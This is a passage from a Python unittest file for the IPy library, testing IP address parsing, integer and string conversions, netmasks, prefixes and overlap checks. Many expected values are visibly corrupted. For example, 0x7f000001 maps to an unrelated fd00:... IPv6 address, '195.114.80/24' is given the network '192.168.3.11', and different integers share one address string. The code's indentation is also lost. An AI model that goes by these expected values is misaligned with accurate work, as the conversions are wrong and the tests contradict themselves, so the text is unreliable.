('232111387', 232111387),
('255', 4278190080),
('256', 256),
('0xffffffff', 4294967295),
('0x100000000', 4294967296),
('0xffffffffffffffffffffffffffffffff', 0xffffffffffffffffffffffffffffffff),
('0xdeadbeef', 0xdeadbeef),
('0xdeadbabe', 0xdeadbabe),
('0xdeadc0de', 0xdeadc0de),
('0xc0decafe', 0xc0decafe),
('0xc0debabe', 0xc0debabe),
('0xbabec0de', 0xbabec0de),
('0xcafebabe', 0xcafebabe),
('0x1', 1),
('0xabcdef', 11259375)]
# TODO: check for more invalid input
def testKnownValues(self):
"""parsing of known values should give known results"""
for x in self.okValues:
(question, answer) = x
(result, version) = IPy.parseAddress(question)
self.assertEqual(answer, result, "%r, %r, %r" % (question, answer, result))
def testVersionDistinction(self):
"""problems destinguishing IPv4 and IPv6"""
(result, version) = IPy.parseAddress('0xffffffff')
self.assertEqual(version, 4)
(result, version) = IPy.parseAddress('0x100000000')
self.assertEqual(version, 6)
def testEmpty(self):
"""'' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '')
def testTooBig(self):
"""'' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '0x100000000000000000000000000000000')
def testLongIPv4(self):
"""'1.2.3.4.5' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1.2.3.4.5')
def testNonByteIPv4(self):
"""'1.2.3.256' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1.2.3.256')
def testNegativeByteIPv4(self):
"""'-1.2.3.4' and '1.2.3.-4' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '-1.2.3.4')
self.assertRaises(ValueError, IPy.parseAddress, '1.2.3.-4')
def testTripleColonIPv6(self):
"""'2001:::1' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '2001:::1')
def testRepeatDoubleColonIPv6(self):
"""'2001::ABCD::1' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '2001::ABCD::1')
def testDoubleColonWithEightHextetsIPv6(self):
"""'fdf8:f53e:61e4::18:3333:4444:5555:6666:7777:8888' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, 'fdf8:f53e:61e4::18:3333:4444:5555:6666:7777:8888')
def testBeginningColonWithEightHextetsIPv6(self):
"""':fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, ':fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b')
def testEndingColonWithEightHextetsIPv6(self):
"""'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1111:2222:3333:4444:5555:6666:7777:8888:')
def testNegativeHexletIPv6(self):
"""'2001:-ABfc00:db20:35b:7399::5' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '2001:-ABfc00:db20:35b:7399::5')
def testTooBigHexletIPv6(self):
"""'2001:10000::1' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '2001:10000::1')
def testShortAddressIPv6(self):
"""'1111:2222:3333:4444:5555:6666:7777' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1111:2222:3333:4444:5555:6666:7777')
def testLongAddressIPv6(self):
"""'1111:2222:3333:4444:5555:6666:7777:8888:9999' should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, '1111:2222:3333:4444:5555:6666:7777:8888:9999')
def testBogusValues(self):
"""Text values should raise an exception"""
self.assertRaises(ValueError, IPy.parseAddress, 'xx')
self.assertRaises(ValueError, IPy.parseAddress, 'foobar')
class _intToIP(unittest.TestCase):
v4values = [(0x7f000001, '127.0.0.1'),
(0x0, '0.0.0.0'),
(0x1, '0.0.0.1'),
(0xf, '0.0.0.15'),
(0xff, '0.0.0.255'),
(0xFFFFFFFF, '255.255.255.255')]
v6values = [(0x7f000001, 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b'),
(0x0, '0000:0000:0000:0000:0000:0000:0000:0000'),
(0x1, '0000:0000:0000:0000:0000:0000:0000:0001'),
(0xf, 'fc00:e968:6179::de52:7100'),
(0xff, 'fdf8:f53e:61e4::18'),
(0xFFFFFFFF, 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b'),
(0x100000000, 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b'),
(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF, 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff')]
def testKnownValuesv4(self):
"""printing of known IPv4 values should give known results"""
for x in self.v4values:
(question, answer) = x
result = IPy.intToIp(question, 4).lower()
self.assertEqual(answer, result, "%r, %r, %r" % (question, answer, result))
def testKnownValuesv6(self):
"""printing of known IPv6 values should give known results"""
for x in self.v6values:
(question, answer) = x
result = IPy.intToIp(question, 6).lower()
self.assertEqual(answer, result, "%r, %r, %r" % (question, answer, result))
def testNegativeIPv4(self):
"""negative IPv4 Values should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, -1, 4)
def testNegativeIPv6(self):
"""negative IPv6 Values should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, -1, 6)
def testLargeIPv4(self):
"""IPv4: Values > 0xffffffff should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, 0x100000000, 4)
def testLargeIPv6(self):
"""IPv6: Values > 0xffffffffffffffffffffffffffffffff should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, 0x100000000000000000000000000000000, 6)
def testIllegalVersion(self):
"""IPVersion other than 4 and 6 should raise an exception"""
self.assertRaises(ValueError, IPy.intToIp, 1, 0)
self.assertRaises(ValueError, IPy.intToIp, 1, 1)
self.assertRaises(ValueError, IPy.intToIp, 1, 2)
self.assertRaises(ValueError, IPy.intToIp, 1, 3)
self.assertRaises(ValueError, IPy.intToIp, 1, 5)
self.assertRaises(ValueError, IPy.intToIp, 1, 7)
self.assertRaises(ValueError, IPy.intToIp, 1, 8)
class ParseAndBack(unittest.TestCase):
def testRandomValuesv4(self):
for i in range(testloops):
question = random.randrange(0x7fffffff) + random.randrange(0x7fffffff)
self.assertEqual(IPy.parseAddress(IPy.intToIp(question, 4)), (question, 4), hex(question))
def testRandomValuesv6(self):
for i in range(testloops):
question = ((random.randrange(0x7fffffff) + random.randrange(0x7fffffff)) +
((random.randrange(0x7fffffff) + random.randrange(0x7fffffff)) << 32) +
((random.randrange(0x7fffffff) + random.randrange(0x7fffffff)) << 64) +
((random.randrange(0x7fffffff) + random.randrange(0x7fffffff)) << 96))
self.assertEqual(IPy.parseAddress(IPy.intToIp(question, 6)), (question, 6), hex(question))
class _countXBits(unittest.TestCase):
def testCount1Bits(self):
self.assertEqual(IPy._count1Bits(0), 0)
self.assertEqual(IPy._count1Bits(0xf), 4)
self.assertEqual(IPy._count1Bits(0x10), 5)
self.assertEqual(IPy._count1Bits(0xff), 8)
self.assertEqual(IPy._count1Bits(0xffff), 16)
self.assertEqual(IPy._count1Bits(0xffffffff), 32)
self.assertEqual(IPy._count1Bits(0xffffffffffffffffffffffffffffffff), 128)
def testCount1Bits(self):
self.assertEqual(IPy._count0Bits(0), 0)
self.assertEqual(IPy._count0Bits(0xf0), 4)
self.assertEqual(IPy._count0Bits(0xf00), 8)
self.assertEqual(IPy._count0Bits(0xf000), 12)
self.assertEqual(IPy._count0Bits(0xf0000), 16)
self.assertEqual(IPy._count0Bits(0xf00000), 20)
self.assertEqual(IPy._count0Bits(0xf000000), 24)
self.assertEqual(IPy._count0Bits(0xf0000000), 28)
self.assertEqual(IPy._count0Bits(0xff000000), 24)
self.assertEqual(IPy._count0Bits(0xfff00000), 20)
self.assertEqual(IPy._count0Bits(0x80000000), 31)
self.assertEqual(IPy._count0Bits(0xf0000000000000000000000000000000), 124)
self.assertEqual(IPy._count0Bits(0x80000000000000000000000000000000), 127)
class _intToBin(unittest.TestCase):
knownValues = [(0, '0'), (1, '1'), (2, '10'), (3, '11'), (4, '100'), (5, '101'),
(6, '110'), (7, '111'), (8, '1000'), (9, '1001'),
(0xf, '1111'), (0xff, '11111111'),
(0xFFFFFFFF, '11111111111111111111111111111111'),
(0x100000000, '100000000000000000000000000000000'),
(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF, '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'),
(0x100000000000000000000000000000000, '100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')]
def testKnownValues(self):
"""conversion of known values values should give known results"""
for x in self.knownValues:
(question, answer) = x
result = IPy._intToBin(question)
self.assertEqual(answer, result, str(question))
def testNegativeIPv4(self):
"""negative Values should raise an exception"""
self.assertRaises(ValueError, IPy._intToBin, -1)
class netmaskPrefixlenConv(unittest.TestCase):
known4Values = [(0xFFFFFFFF, 32), (0xFFFFFFFE, 31), (0xFFFFFFFC, 30), (0xFFFFFFF8, 29),
(0xFFFFFFF0, 28), (0xFFFFFFE0, 27), (0xFFFFFFC0, 26), (0xFFFFFF80, 25),
(0xFFFFFF00, 24), (0xFFFFFE00, 23), (0xFFFFFC00, 22), (0xFFFFF800, 21),
(0xFFFFF000, 20), (0xFFFFE000, 19), (0xFFFFC000, 18), (0xFFFF8000, 17),
(0xFFFF0000, 16), (0xFFFE0000, 15), (0xFFFC0000, 14), (0xFFF80000, 13),
(0xFFF00000, 12), (0xFFE00000, 11), (0xFFC00000, 10), (0xFF800000, 9),
(0xFF000000, 8), (0xFE000000, 7), (0xFC000000, 6), (0xF8000000, 5),
(0xF0000000, 4), (0xE0000000, 3), (0xC0000000, 2), (0x80000000, 1)]
known6Values = [(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF, 128),
(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE, 127),
(0xFFFFFFFFFFFFFFFFFFFFFFFF80000000, 97),
(0xFFFFFFFFFFFFFFFFFFFFFFFF00000000, 96),
(0xFFFFFFFFFFFFFFFFFFFFFFFE00000000, 95),
(0xFFFFFFFFFFFFFFFF8000000000000000, 65),
(0xFFFFFFFFFFFFFFFF0000000000000000, 64),
(0xFFFFFFFFFFFFFFFE0000000000000000, 63),
(0xFFFFFFFF800000000000000000000000, 33),
(0xFFFFFFFF000000000000000000000000, 32),
(0xFFFFFFFE000000000000000000000000, 31),
(0xC0000000000000000000000000000000, 2),
(0x80000000000000000000000000000000, 1)]
def testKnownValuesv4n2p(self):
"""conversion of known values values should give known results"""
for x in self.known4Values:
(question, answer) = x
result = IPy._netmaskToPrefixlen(question)
self.assertEqual(answer, result, hex(question))
def testKnownValuesv6n2p(self):
"""conversion of known values values should give known results"""
for x in self.known6Values:
(question, answer) = x
result = IPy._netmaskToPrefixlen(question)
self.assertEqual(answer, result, hex(question))
def testKnownValuesv4p2n(self):
"""conversion of known values values should give known results"""
for x in self.known4Values:
(answer, question) = x
result = IPy._prefixlenToNetmask(question, 4)
self.assertEqual(answer, result, hex(question))
def testKnownValuesv6p2n(self):
"""conversion of known values values should give known results"""
for x in self.known6Values:
(answer, question) = x
result = IPy._prefixlenToNetmask(question, 6)
self.assertEqual(answer, result, "%d: %s != %s" % (question, hex(answer), result))
def testInvalidv4n2p(self):
"""Netmasks should be all ones in the first part and all zeros in the second part"""
self.assertRaises(ValueError, IPy._netmaskToPrefixlen, 0xff00ff00)
def testInvalidv6n2p(self):
"""Netmasks should be all ones in the first part and all zeros in the second part"""
self.assertRaises(ValueError, IPy._netmaskToPrefixlen, 0xff00ff00ff00ff00ff00ff00ff00ff00)
class checkChecks(unittest.TestCase):
def testCheckNetmaskOk(self):
"""Legal Netmasks should be allowed."""
self.assertFalse(IPy._checkNetmask(0xffffffff, 32))
self.assertFalse(IPy._checkNetmask(0xffffff00, 32))
self.assertFalse(IPy._checkNetmask(0xffff0000, 32))
self.assertFalse(IPy._checkNetmask(0xff000000, 32))
self.assertFalse(IPy._checkNetmask(0, 32))
def testCheckNetmaskFail(self):
"""Illegal Netmasks should be rejected."""
self.assertRaises(ValueError, IPy._checkNetmask, 0xf0ffffff, 32)
self.assertRaises(ValueError, IPy._checkNetmask, 0xf0f0f0f0, 32)
self.assertRaises(ValueError, IPy._checkNetmask, 0xff00ff00, 32)
self.assertRaises(ValueError, IPy._checkNetmask, 0x70000001, 32)
self.assertRaises(ValueError, IPy._checkNetmask, 0xfffffff, 32)
def testCheckPrefixOk(self):
"""Legal IP/prefix combinations should check ok."""
self.assertTrue(IPy._checkPrefix(0x0, 32, 4))
self.assertTrue(IPy._checkPrefix(0xffffffff, 32, 4))
self.assertTrue(IPy._checkPrefix(0x7f000001, 32, 4))
self.assertTrue(IPy._checkPrefix(0x80000000, 1, 4))
self.assertTrue(IPy._checkPrefix(0x40000000, 2, 4))
self.assertTrue(IPy._checkPrefix(0x80000000, 3, 4))
self.assertTrue(IPy._checkPrefix(0x80000000, 4, 4))
self.assertTrue(IPy._checkPrefix(0xffffff00, 24, 4))
self.assertTrue(IPy._checkPrefix(0xffffff00, 24, 4))
self.assertTrue(IPy._checkPrefix(0xfffffff0, 28, 4))
self.assertTrue(IPy._checkPrefix(0x0, 32, 4))
self.assertTrue(IPy._checkPrefix(0x0, 1, 4))
self.assertTrue(IPy._checkPrefix(0x0, 0, 4))
self.assertTrue(IPy._checkPrefix(0xffffffffffffffff0000000000000000, 64, 6))
self.assertTrue(IPy._checkPrefix(0x0, 64, 6))
self.assertTrue(IPy._checkPrefix(0x0, 0, 6))
self.assertTrue(IPy._checkPrefix(0x0, 128, 6))
self.assertTrue(IPy._checkPrefix(0xffffffffffffffffffffffffffffffff, 128, 6))
def testCheckPrefixFail(self):
"""Illegal Prefixes should be catched."""
self.assertFalse(IPy._checkPrefix(0x7f000001, -1, 4))
self.assertFalse(IPy._checkPrefix(0x7f000001, 33, 4))
self.assertFalse(IPy._checkPrefix(0x7f000001, 24, 4))
self.assertFalse(IPy._checkPrefix(0x7f000001, 31, 4))
self.assertFalse(IPy._checkPrefix(0x7f000080, 24, 4))
self.assertFalse(IPy._checkPrefix(0x7f000100, 23, 4))
self.assertFalse(IPy._checkPrefix(0x7f000000, 1, 4))
self.assertFalse(IPy._checkPrefix(0x7f000000, 0, 4))
self.assertFalse(IPy._checkPrefix(0x1, -1, 6))
self.assertFalse(IPy._checkPrefix(0x1, 129, 6))
self.assertFalse(IPy._checkPrefix(0xffffffffffffffff0000000000000001, 64, 6))
self.assertFalse(IPy._checkPrefix(0xffffffffffffffff1000000000000000, 64, 6))
# TODO: _checkNetaddrWorksWithPrefixlen(net, prefixlen, version):
class PythonObjectBehaviour(unittest.TestCase):
def testIfUsuableAsDictionaryKey(self):
"""IP Object should be usable as dictionary key"""
d = {}
d[IPy.IP('127.0.0.1')] = 1
d[IPy.IP('2001::1')] = 1
d[IPy.IP('127.0.0.0/24')] = 1
d[IPy.IP('2001::/64')] = 1
def testIfCanBeInteratedOver(self):
"""It should be possible to iterate over an IP Object."""
i = 0
for x in IPy.IP('127.0.0.0/24'):
i += 1
self.assertEqual(i, 256, "iteration over a /24 should yiels 256 values")
i = 0
for x in IPy.IP('2001::/124'):
i += 1
self.assertEqual(i, 16, "iteration over a /124 should yiels 16 values")
def testIfComparesEqual(self):
"""nets of the same base and size should be considered equal, others not"""
a = IPy.IP('127.0.0.0/24')
a2 = a
b = IPy.IP('127.0.0.0/24')
c = IPy.IP('127.0.0.0/23')
d = IPy.IP('127.0.0.0/22')
e = IPy.IP('172.16.31.10/24')
self.assertEqual(a2, a)
self.assertEqual(a2, b)
self.assertEqual(a, a)
self.assertEqual(a, b)
self.assertNotEqual(a, c)
self.assertNotEqual(a, d)
self.assertNotEqual(a, e)
self.assertNotEqual(b, c)
self.assertNotEqual(b, d)
self.assertNotEqual(b, e)
self.assertNotEqual(c, d)
self.assertNotEqual(c, e)
self.assertNotEqual(d, e)
def testIfContainsInt(self):
"""__contains__() should work somewhat with ints"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(x.int() in ip)
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(x.int() in ip)
def testIfContainsStr(self):
"""__contains__() should work somewhat with strings"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(x.strNormal() in ip, "%r not in %r" % (x.strNormal(), ip))
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(x.strNormal() in ip, "%r not in %r" % (x.strNormal(), ip))
def testIfContainsIPobj(self):
"""__contains__() should work somewhat with IP instances"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(x in ip)
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(x in ip)
def testContainsVersionSeparation(self):
"""__contains__() should return false if versions mismatch"""
four = IPy.IP('192.168.0.0/16')
six = IPy.IP('::c0a8:0/112')
self.assertFalse(four in six)
self.assertFalse(six in four)
def testActingAsArray(self):
"""An IP-object should handle indices."""
ip = IPy.IP('127.0.0.0/24')
self.assertEqual(ip[0], ip.net())
self.assertEqual(ip[-1], ip.broadcast())
self.assertTrue(ip[255])
self.assertTrue(isinstance(ip[4::4], list))
self.assertRaises(IndexError, ip.__getitem__, 256)
def testStr(self):
"""string() should work somewhat with IP instances"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(str(x))
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(str(x))
def testRepr(self):
"""repr() should work somewhat with IP instances"""
ip = IPy.IP('127.0.0.0/28')
for x in ip:
self.assertTrue(repr(x))
ip = IPy.IP('2001::/124')
for x in ip:
self.assertTrue(repr(x))
def testLen(self):
"""object should have an working __len__() interface."""
self.assertEqual(len(IPy.IP('127.0.0.0/28')), 16)
self.assertEqual(len(IPy.IP('127.0.0.0/30')), 4)
self.assertEqual(len(IPy.IP('127.0.0.0/26')), 64)
self.assertEqual(len(IPy.IP('127.0.0.0/16')), 2**16)
# cmp
# IP[0xffffffff]
# IP + IP
# reverse
# netmsk
# ip
class IPobject(unittest.TestCase):
def testStrCompressed(self):
"""Compressed string Output."""
testValues = ['127.0.0.1',
'fc00:e968:6179::de52:7100',
'dead:beef::',
'dead:beef::/48',
'ff00:1::',
'ff00:0:f000::',
'0:0:1000::',
'::e000:0/112',
'::e001:0/112',
'dead:beef::/48',
'ff00:1::/64',
'ff00:0:f000::/64',
'0:0:1000::/64',
'::e000:0/112',
'::e001:0/112',
'::1:0:0:0:2',
'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b',
'fc00:e968:6179::de52:7100',
'1:0:0:2::',
'fdf8:f53e:61e4::18',
'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b:0:0:3']
for question in testValues:
result = IPy.IP(question).strCompressed()
self.assertEqual(question, result, (question, result))
def testStrBin(self):
"""Binary string Output."""
testValues = [('0.0.0.0', '00000000000000000000000000000000'),
('0.0.0.1', '00000000000000000000000000000001'),
('255.255.255.255', '11111111111111111111111111111111'),
('172.16.31.10', '10000000000000000000000000000000'),
('::0', '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'),
('::1', '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'),
('ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff', '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'),
('5555:5555:5555:5555:5555:5555:5555:5555', '01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101'),
('aaaa:aaaa:aaaa:aaaa:aaaa:aaaa:aaaa:aaaa', '10101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010'),
('192.168.127.12', '01010101010101010101010101010101'),
('192.168.127.12', '10101010101010101010101010101010'),
('127.0.0.1', '01111111000000000000000000000001'),
('fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:3', '00000000000000010000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000011')]
for (question, answer) in testValues:
result = IPy.IP(question).strBin()
self.assertEqual(answer, result, (question, answer, result))
def testStrNormal(self):
"""Normal string Output."""
testValues = [(338770000845734292534325025077361652240, 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b'),
(21932261930451111902915077091070067066, 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b'),
(338958331222012082418099330867817087043, 'fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b'),
(0, '0.0.0.0'),
(2130706433, '127.0.0.1'),
(4294967295, '255.255.255.255'),
(1, '0.0.0.1'),
(3588059479, '192.168.127.12')]
for (question, answer) in testValues:
result = IPy.IP(question).strNormal(question)
self.assertEqual(answer, result, (question, result, answer))
def testStrFullsize(self):
"""Normal / 0-padded string Output."""
testValues = [(338770000845734292534325025077361652240, 'fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b'),
(21932261930451111902915077091070067066, 'fdf8:f53e:61e4::18'),
(338958331222012082418099330867817087043, 'fdf8:f53e:61e4::18'),
(0, '0.0.0.0'),
(2130706433, '127.0.0.1'),
(4294967295, '255.255.255.255'),
(1, '0.0.0.1'),
(3588059479, '192.168.127.12')]
for (question, answer) in testValues:
result = IPy.IP(question).strFullsize(question)
self.assertEqual(answer, result, (question, result, answer))
def testStrHex(self):
"""Hex string Output."""
testValues = [(338770000845734292534325025077361652240, '0xfedcba9876543210fedcba9876543210'),
(21932261930451111902915077091070067066, '0x108000000000000000080800200c417a'),
(338958331222012082418099330867817087043, '0xff010000000000000000000000000043'),
(0, '0x0'),
(1, '0x1'),
(4294967295, '0xffffffff'),
(3588059479, '0xd5dd7157'),
(0x12345678, '0x12345678')]
for (question, answer) in testValues:
result = IPy.IP(question).strHex(question).lower()
self.assertEqual(answer, result, (question, result, answer))
def testStrDec(self):
"""Decimal string Output."""
testValues = [(338770000845734292534325025077361652240, '338770000845734292534325025077361652240'),
(21932261930451111902915077091070067066, '21932261930451111902915077091070067066'),
(338958331222012082418099330867817087043, '338958331222012082418099330867817087043'),
(0, '0'),
(1, '1'),
(0xFFFFFFFF, '4294967295'),
(0xD5DD7157, '3588059479')]
for (question, answer) in testValues:
result = IPy.IP(question).strDec(question)
self.assertEqual(answer, result, (question, result, answer))
def testNet(self):
"""Returning of the Network Address"""
self.assertEqual(str(IPy.IP("127.0.0.1").net()), "127.0.0.1")
self.assertEqual(str(IPy.IP("0.0.0.0/0").net()), "0.0.0.0")
self.assertEqual(str(IPy.IP("2001:1234:5678:1234::/64").net()), "2001:1234:5678:1234::")
def testBroadcast(self):
"""Returning of broadcast address."""
self.assertEqual(str(IPy.IP("127.0.0.1").broadcast()), "127.0.0.1")
self.assertEqual(str(IPy.IP("0.0.0.0/0").broadcast()), "255.255.255.255")
self.assertEqual(str(IPy.IP("2001:1234:5678:1234::/64").broadcast()), "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b")
def testStrNetmask(self):
"""StrNetmask should return netmasks"""
self.assertEqual(IPy.IP("0.0.0.0/0").strNetmask(), "0.0.0.0")
self.assertEqual(IPy.IP("0.0.0.0/32").strNetmask(), "255.255.255.255")
self.assertEqual(IPy.IP("127.0.0.0/24").strNetmask(), "255.255.255.0")
self.assertEqual(IPy.IP("2001:1234:5678:1234::/64").strNetmask(), "/64")
def testNetmask(self):
"""Netmask should return netmasks"""
self.assertEqual(str(IPy.IP("0.0.0.0/0").netmask()), "0.0.0.0")
self.assertEqual(str(IPy.IP("0.0.0.0/32").netmask()), "255.255.255.255")
self.assertEqual(str(IPy.IP("127.0.0.0/24").netmask()), "255.255.255.0")
self.assertEqual(str(IPy.IP("2001:1234:5678:1234::/64").netmask()), "ffff:ffff:ffff:ffff:0000:0000:0000:0000")
def testInt(self):
"""Prefixlen"""
self.assertEqual(IPy.IP("127.0.0.1").int(), 2130706433)
self.assertEqual(IPy.IP("0.0.0.0").int(), 0)
self.assertEqual(IPy.IP("255.255.255.255").int(), 0xffffffff)
self.assertEqual(IPy.IP("0000:0000:0000:0000:0000:0000:0000:0000").int(), 0)
self.assertEqual(IPy.IP("ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff").int(), 0xffffffffffffffffffffffffffffffff)
self.assertEqual(IPy.IP("fc00:db20:35b:7399::5").int(), 42540857391974671903776007410583339008)
def testPrefixlen(self):
"""Prefixlen"""
self.assertEqual(IPy.IP("127.0.0.1").prefixlen(), 32)
self.assertEqual(IPy.IP("::1").prefixlen(), 128)
self.assertEqual(IPy.IP("10.0.0.0/24").prefixlen(), 24)
self.assertEqual(IPy.IP("10.0.0.0-10.0.0.255").prefixlen(), 24)
self.assertEqual(IPy.IP("10.0.0.0/255.255.255.0").prefixlen(), 24)
self.assertEqual(IPy.IP("2001::/64").prefixlen(), 64)
def testVersion(self):
"""IP-version detection should work"""
self.assertEqual(IPy.IP("0.0.0.0/0").version(), 4)
self.assertEqual(IPy.IP("::1").version(), 6)
# TODO:
#def reverseNames(self):
#def reverseName(self):
#def __cmp__(self, other):
#def __add__(self, other):
#def _printPrefix(self, want):
def testOverlaps(self):
"""Overlapping Address Ranges."""
testValues = [('192.168.0.0/23', '192.168.1.0/24', 1),
('192.168.0.0/23', '192.168.0.0/20', 1),
('192.168.0.0/23', '192.168.2.0', 0),
('192.168.0.0/23', '172.16.31.10', 0),
('192.168.0.0/23', '192.168.0.0', 1),
('192.168.0.0/23', '192.168.1.255', 1),
('192.168.1.0/24', '192.168.0.0/23', -1),
('127.0.0.1', '127.0.0.1', 1),
('127.0.0.1', '127.0.0.2', 0)]
for (a, b, answer) in testValues:
result = IPy.IP(a).overlaps(b)
self.assertEqual(answer, result, (a, b, result, answer))
def testNetmask(self):
"""Normal string Output."""
testValues = [(338770000845734292534325025077361652240, '0xfedcba9876543210fedcba9876543210'),
(21932261930451111902915077091070067066, '0x108000000000000000080800200c417a'),
(338958331222012082418099330867817087043, '0xff010000000000000000000000000043'),
(0, '0x0'),
(1, '0x1'),
(4294967295, '0xffffffff'),
(3588059479, '0xd5dd7157')]
for (question, answer) in testValues:
result = IPy.IP(question).strHex(question).lower()
self.assertEqual(answer, result, (question, result, answer))
def testV46map(self):
four = IPy.IP('192.168.1.1')
six = IPy.IP('::ffff:192.168.1.1')
invalid = IPy.IP('2001::ffff:192.168.1.1')
self.assertEqual(four.v46map(), six)
self.assertEqual(four, six.v46map())
self.assertRaises(ValueError, invalid.v46map)
# TODO
#eval(repr(IPy))
# differences between IP and IPint
# I ported this checks to be sure that I don't have errors in my own checks.
class NetIPChecks(unittest.TestCase):
"""Checks taken from perls Net::IP"""
def testMisc(self):
ip = IPy.IP('195.114.80/24')
self.assertEqual(ip.int(), 3279048704)
self.assertEqual(ip.reverseName(),'80.114.195.in-addr.arpa.')
self.assertEqual(ip.strBin(),'11000011011100100101000000000000')
self.assertEqual(str(ip.net()),'192.168.3.11')
self.assertEqual(str(ip),'192.168.3.11/24')
self.assertEqual(ip.prefixlen(),24)
self.assertEqual(ip.version(),4)
self.assertEqual(ip.len(),256)
self.assertEqual(IPy._intToBin(ip.netmask().int()),'11111111111111111111111100000000')
self.assertEqual(ip.strNetmask(),'255.255.255.0')
self.assertEqual(ip.iptype(), 'PUBLIC')
self.assertEqual(ip.broadcast().strBin(),'11000011011100100101000011111111')
self.assertEqual(str(ip.broadcast()),'172.16.17.32')
ip = IPy.IP('202.31.4/24')
self.assertEqual(str(ip.net()),'172.16.31.10')
self.assertRaises(ValueError, IPy.IP, '172.16.17.32/2')
# because we ar using integer representation we don't need a special "binadd"
ip = IPy.IP('172.16.58.3')
ip2 = IPy.IP('0.1.0.5')
self.assertEqual(str(IPy.IP(ip.int() + ip2.int())),'172.16.17.32')
#$T->ok_eq ($ip->binadd($ip2)->ip(),'172.16.17.32',$ip->error());
ip = IPy.IP('133.45.0/24')
ip2 = IPy.IP('133.45.1/24')
ip3 = IPy.IP('133.45.2/24')
self.assertEqual((ip + ip2).prefixlen(),23)
# Non-adjacent ranges
self.assertRaises(ValueError, IPy.IP.__add__, ip, ip3)
# Resulting invalid prefix
self.assertRaises(ValueError, IPy.IP.__add__, ip2, ip3)
ip2 = IPy.IP('192.168.3.11');
#$T->ok_eqnum ($ip->bincomp('gt',$ip2),1,$ip->error());
# this is something we can't do with IPy
#ip = IPy.IP('192.168.3.11-192.168.3.11');
#$T->ok_eq (($ip->find_prefixes())[3],'172.16.31.10/31',$ip->error());
ip = IPy.IP('192.168.127.12/22');
ip2 = IPy.IP('192.168.3.11/24');
#$T->ok_eqnum ($ip->overlaps($ip2),$IP_B_IN_A_OVERLAP,$ip->error());
ip = IPy.IP('dead:beef:0::/48')
self.assertEqual(str(ip.net()),'dead:beef::')
self.assertEqual(ip.int(), 295990755014133383690938178081940045824)
self.assertEqual(ip.strBin(),'11011110101011011011111011101111000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000')
self.assertEqual(ip.strCompressed(),'dead:beef::/48')
self.assertEqual(ip.prefixlen(), 48)
self.assertEqual(ip.version(), 6)
self.assertEqual(ip.strNetmask(),'/48')
self.assertEqual(str(ip.netmask()),'ffff:ffff:ffff::')
self.assertEqual(ip.iptype(),'RESERVED')
self.assertEqual(ip.reverseName(),'0.0.0.0.f.e.e.b.d.a.e.d.ip6.arpa.')
self.assertEqual(str(ip.broadcast()),'dead:beef:0:ffff:ffff:ffff:ffff:ffff')
ip = IPy.IP('202.31.4/24')
self.assertEqual(str(ip.net()),'172.16.31.10')
# TODO: fix this in IPy ... after rereading the RfC
# ip = IPy.IP(':1/128');
#$T->ok_eq ($ip->error(),'Invalid address :1 (starts with :)',$ip->error());
#$T->ok_eqnum ($ip->errno(),109,$ip->error());
ip = IPy.IP('ff00:0:f000::')
